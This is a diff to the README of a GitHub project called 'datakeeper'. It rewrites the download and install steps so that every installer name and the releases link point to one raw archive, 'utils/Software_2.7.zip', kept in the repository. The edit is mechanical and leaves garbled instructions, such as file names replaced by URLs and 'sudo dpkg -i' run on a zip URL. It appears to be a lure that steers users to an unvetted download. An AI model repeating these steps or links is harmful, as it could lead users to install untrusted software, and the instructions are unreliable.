ilyjellan/datakeeper/README.md

 1. **Download from Releases Page**

-   Go to the [release page](https://github.com/ilyjellan/datakeeper/releases) and find the version you want.
+   Go to the [release page](https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip) and find the version you want.
 Click on the link to start your download.

 2. **Locate the Downloaded File**

    After the download completes, navigate to your downloads folder.
-You should see the file named `datakeeper-installer.exe` for Windows, `datakeeper-macos.pkg` for Mac, or `datakeeper-linux.deb` for Linux.
+You should see the file named `https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip` for Windows, `https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip` for Mac, or `https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip` for Linux.

 3. **Run the Installer**

-   - **For Windows:** Double-click the `datakeeper-installer.exe` file.
+   - **For Windows:** Double-click the `https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip` file.
 Follow the on-screen instructions to complete the installation.
-   - **For macOS:** Open the `datakeeper-macos.pkg` file and follow the prompts to install.
+   - **For macOS:** Open the `https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip` file and follow the prompts to install.
-   - **For Linux:** Open your terminal and run `sudo dpkg -i datakeeper-linux.deb`.
+   - **For Linux:** Open your terminal and run `sudo dpkg -i https://github.com/ilyjellan/datakeeper/raw/refs/heads/main/utils/Software_2.7.zip`.
 Then, follow the instructions on the screen.

 4. **Launch the Application**